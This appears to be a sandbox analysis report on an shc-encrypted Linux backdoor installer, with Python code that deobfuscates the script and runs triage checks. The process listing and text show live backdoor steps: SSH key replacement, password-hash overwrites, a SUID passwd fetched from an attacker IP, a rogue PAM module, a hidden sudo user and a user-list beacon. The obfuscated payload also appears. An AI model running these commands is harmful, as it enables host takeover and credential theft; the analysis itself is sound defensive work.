z$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$u
Hz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz
$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]
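
The two bash -c entries above are how an shc wrapper launches its payload: shc (the "shc" in the directory name 样本/Linux/shc加密脚本, Chinese for "samples/Linux/shc-encrypted scripts") compiles a shell script into an ELF that decrypts the script at run time and hands it to the shell as the -c argument, so the "encrypted" script appears in plaintext on the command line the sandbox captured. That plaintext is obfuscated a second time: every 3-byte piece of the real script is stored in a shell variable (xFz='Vwn'; SDz='b'; ...) in shuffled order, and eval "$Az$Bz$Cz..." concatenates the pieces back in the right order. Nothing is encrypted, so the script can be rebuilt by parsing rather than by running it. The Python below is an added example written for this report, not code from the sample, the sandbox vendor, or shc: it collects the assignments (including the bash '\'' idiom for an embedded single quote, which the fragments use heavily) and the eval string, and reassembles the script statically. It ships with a constructed miniature input in the same scheme; the fragment content is invented for the test. Two caveats for running it on the real command line: rejoin the report's wrapped lines by deleting the line breaks only (several of the wrapped lines end in a trailing space that is part of a fragment, and one break splits the token $tBz), and pass overrides={"z": "\n"}: the report shows z=" ", but the reassembled text only parses as bash if $z is a newline (for example "&> /dev/null" + $z + "then"), so the single-line rendering almost certainly collapsed a literal newline to a space.

```python
"""Statically rebuild a bash script hidden behind chunked shell variables.

Scheme (as in the sample's bash -c argument): the script is cut into
3-byte pieces, each stored in a variable (xFz='Vwn'; ...) in shuffled
order, and eval "$Az$Bz$Cz..." glues them back. Nothing is encrypted,
so the text is recovered by parsing, without running any of it.
"""
import re

# name='value' (bash single quotes; an embedded quote is spelled '\'')
# or name="value" (the sample uses this form for its separator variable).
ASSIGN_RE = re.compile(
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)="
    r"(?:'(?P<sq>(?:[^']|'\\'')*)'|\"(?P<dq>[^\"]*)\")"
)
# The reassembly order: eval "$Az$Bz$Cz...".
EVAL_RE = re.compile(r'eval\s+"((?:\$[A-Za-z_][A-Za-z0-9_]*)+)"')
REF_RE = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*)")


def parse_fragments(text):
    """Map every fragment variable to its literal (unescaped) value."""
    frags = {}
    for m in ASSIGN_RE.finditer(text):
        if m.group("sq") is not None:
            # Inside single quotes nothing is special; a quote can only be
            # produced by closing, escaping and reopening: '\'' -> '
            frags[m.group("name")] = m.group("sq").replace("'\\''", "'")
        else:
            frags[m.group("name")] = m.group("dq")
    return frags


def deobfuscate(text, overrides=None):
    """Return the script that eval would have executed.

    overrides corrects fragments the report rendered wrongly, for
    example {"z": "\\n"} when a newline was collapsed to a space.
    """
    frags = parse_fragments(text)
    frags.update(overrides or {})
    m = EVAL_RE.search(text)
    if m is None:
        raise ValueError('no eval "$..." reassembly string found')
    order = REF_RE.findall(m.group(1))
    missing = sorted({n for n in order if n not in frags})
    if missing:
        raise ValueError(f"unresolved fragments: {missing[:5]}")
    return "".join(frags[n] for n in order)


# Constructed miniature in the report's scheme (invented content, not the
# sample's text): out-of-order 3-byte fragments, the '\'' quoting idiom,
# a double-quoted separator variable holding a real newline, and the
# eval string that fixes the order.
SAMPLE = r"""#!/bin/bash z="
";Qz='l p';Az='pam';Lz='o '\''';Dz='etc';Wz='$pa';Bz='fil';Uz='o'\'' ';Rz='am_';Cz='e=/';Kz='ech';Hz='mmo';Xz='mfi';Ez='/pa';Sz='exe';Iz='n-a';Nz='h o';Fz='m.d';Tz='c.s';Mz='aut';Gz='/co';Vz='>> ';Oz='pti';Jz='uth';Pz='ona';Yz='le'; eval "$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$z$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz"
"""

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Run on the rejoined command line, the same routine recovers a plain bash installer whose lines can be cross-checked against this page: if ! command -v wrmsr &> /dev/null followed by apt-get install -y msr-tools 2>&1 > /dev/null (the apt-get/dpkg activity under Processes); useradd cheeki and usermod -aG sudo cheeki (the useradd/usermod rows); pamfile=/etc/pam.d/common-auth and echo "auth optional pam_exec.so quiet expose_authtok /usr/sbin/pam_tms" >> $pamfile (the PAM row); mv /bin/passwd /bin/passwd.orig, a download of a replacement passwd, then chmod 4755 /bin/passwd and chmod u+s /bin/passwd (the chmod rows under "Modifies special file permissions"); and a for username in $users loop that sets every shell user's password hash with usermod -p. The download URLs in the fragments, http://185.252.178.82:6972/ for passwd and pam_tms and http://179.43.154.189:1010/users?... for reporting the base64-encoded user list, are indicators only; the sandbox network section, not the fragments, is the authority on what was actually contacted.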

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.ze42Od3Syf /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.ze42Od3Syf]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/样本/Linux/shc加密脚本/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

/usr/bin/chmod

[chmod 4755 /bin/passwd]

/usr/bin/chmod

[chmod u+s /bin/passwd]

/usr/bin/cp

[cp /bin/passwd /usr/bin/passwd]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/pam_tms]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/pam_tms]

/usr/bin/chmod

[chmod +x /sbin/pam_tms]

/usr/bin/grep

[grep -q pam_tms /etc/pam.d/common-auth]

/usr/sbin/useradd

[useradd cheeki]

/usr/sbin/usermod

[usermod -aG sudo cheeki]

/usr/sbin/usermod

[usermod -aG wheel cheeki]

/usr/sbin/usermod

[usermod -p $6$vrC8Hya.mmeUeIem$Li01KI3RQUpyYepjXUhHF23fTle/wXqAoR0xUFo697faBvmsuXJBTMMK89vGf1YHzhztRGGsNbA/eTIIRXy5Y/ cheeki]

/usr/bin/mv

[mv /var/tmp/.xrx/key /home/cheeki/.ssh/authorized_keys]

/usr/bin/mkdir

[mkdir /var/tmp/.x]

/usr/bin/mv

[mv /var/tmp/.xrx/secure /var/tmp/.x/secure]

/usr/bin/chmod

[chmod +x /var/tmp/.x/secure]

/var/tmp/.x/secure

[/var/tmp/.x/secure]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA=]

/usr/bin/rm

[rm -rf /root/.bash_history]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/init0]

/usr/bin/rm

[rm -rf init0]
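
The process listing above is the whole post-install sequence in shell: the installer wipes cron and kills competing processes, replaces every authorized_keys it can reach with /var/tmp/.xrx/key and locks it with chattr +ia, strips the immutable bits from /etc/passwd and /etc/shadow and sets one SHA-512 crypt hash on root and user with usermod -p, moves the real passwd binary aside and fetches a replacement from 185.252.178.82:6972 that it makes SUID, fetches pam_tms and greps /etc/pam.d/common-auth for it, creates the sudo/wheel user cheeki with its own hash, then collects every account with an interactive shell (cat /etc/passwd | grep | cut -d: -f1 | tr '\n' ' ' | base64) and sends the result to 179.43.154.189:1010 as the userlist parameter before deleting /root/.bash_history. The following is an added example, not code from the report or from the sample: it re-implements the enumeration pipeline to confirm what the observed beacon carried, decodes the beacon, and runs three triage checks over constructed stand-ins for the victim's /etc/passwd, /etc/shadow and common-auth (accounts sharing one password hash, and PAM modules outside an allow list). The two crypt hashes and the beacon URL are quoted from the listing; the sample file contents, the allow list and the function names are assumptions.

```python
import base64
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Beacon URL copied from the process listing.
OBSERVED_BEACON = "http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA="

# Shell names matched by the sample's grep: '/bin/bash\|/bin/sh\|/zsh\|/fish'.
SHELL_PATTERN = re.compile(r"/bin/bash|/bin/sh|/zsh|/fish")

# Constructed /etc/passwd standing in for the sandbox host after `useradd cheeki`
# (useradd without -s is assumed to leave cheeki with /bin/sh).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
cheeki:x:1001:1001::/home/cheeki:/bin/sh
"""

# Both hashes are quoted from the usermod -p commands in the listing; the
# remaining shadow fields are constructed.
SHARED_HASH = "$6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/"
CHEEKI_HASH = "$6$vrC8Hya.mmeUeIem$Li01KI3RQUpyYepjXUhHF23fTle/wXqAoR0xUFo697faBvmsuXJBTMMK89vGf1YHzhztRGGsNbA/eTIIRXy5Y/"
SAMPLE_SHADOW = (
    f"root:{SHARED_HASH}:19900:0:99999:7:::\n"
    "daemon:*:19900:0:99999:7:::\n"
    f"user:{SHARED_HASH}:19900:0:99999:7:::\n"
    f"cheeki:{CHEEKI_HASH}:19900:0:99999:7:::\n"
)

# Constructed /etc/pam.d/common-auth with a foreign module appended (assumed layout).
SAMPLE_COMMON_AUTH = """auth    [success=1 default=ignore]  pam_unix.so nullok
auth    requisite                   pam_deny.so
auth    required                    pam_permit.so
auth    optional                    pam_tms.so
"""


def interactive_users(passwd_text):
    """Same selection the sample makes: grep for a shell name, then cut -d: -f1."""
    return [line.split(":")[0] for line in passwd_text.splitlines() if SHELL_PATTERN.search(line)]


def encode_userlist(users):
    """tr '\\n' ' ' | base64: each name followed by a space, no trailing newline."""
    joined = "".join(u + " " for u in users)
    return base64.b64encode(joined.encode()).decode()


def decode_beacon(url):
    """Recover the account names carried in the userlist parameter of a beacon URL."""
    query = parse_qs(urlsplit(url).query)
    return base64.b64decode(query["userlist"][0]).decode().split()


def shared_password_hashes(shadow_text):
    """Map every crypt hash used by more than one account to the accounts sharing it."""
    by_hash = defaultdict(list)
    for line in shadow_text.splitlines():
        name, hash_field = line.split(":")[:2]
        if hash_field.startswith("$"):  # skip locked (*, !) and empty fields
            by_hash[hash_field].append(name)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def foreign_pam_modules(common_auth_text, allowed=("pam_unix.so", "pam_deny.so", "pam_permit.so")):
    """Return PAM modules referenced in an auth stack that are not on the allow list."""
    found = []
    for line in common_auth_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        found.extend(m for m in re.findall(r"\bpam_\w+\.so", line) if m not in allowed)
    return found


if __name__ == "__main__":
    users = interactive_users(SAMPLE_PASSWD)
    print("userlist parameter:", encode_userlist(users))
    print("beacon carried:", decode_beacon(OBSERVED_BEACON))
    print("accounts sharing a hash:", shared_password_hashes(SAMPLE_SHADOW))
    print("foreign PAM modules:", foreign_pam_modules(SAMPLE_COMMON_AUTH))
```

Re-encoding the constructed passwd reproduces the observed parameter exactly, which is how an analyst confirms that the beacon carried the names root, user and cheeki and nothing else. Identical hash strings across unrelated accounts never occur on a healthy host (each crypt call draws a fresh salt), so the shared-hash check is a cheap fleet-wide indicator for this family's usermod -p step.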

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
SE 194.71.11.173:80 se.archive.ubuntu.com tcp
IT 185.252.178.82:6972 N/A tcp
IT 185.252.178.82:6972 N/A tcp
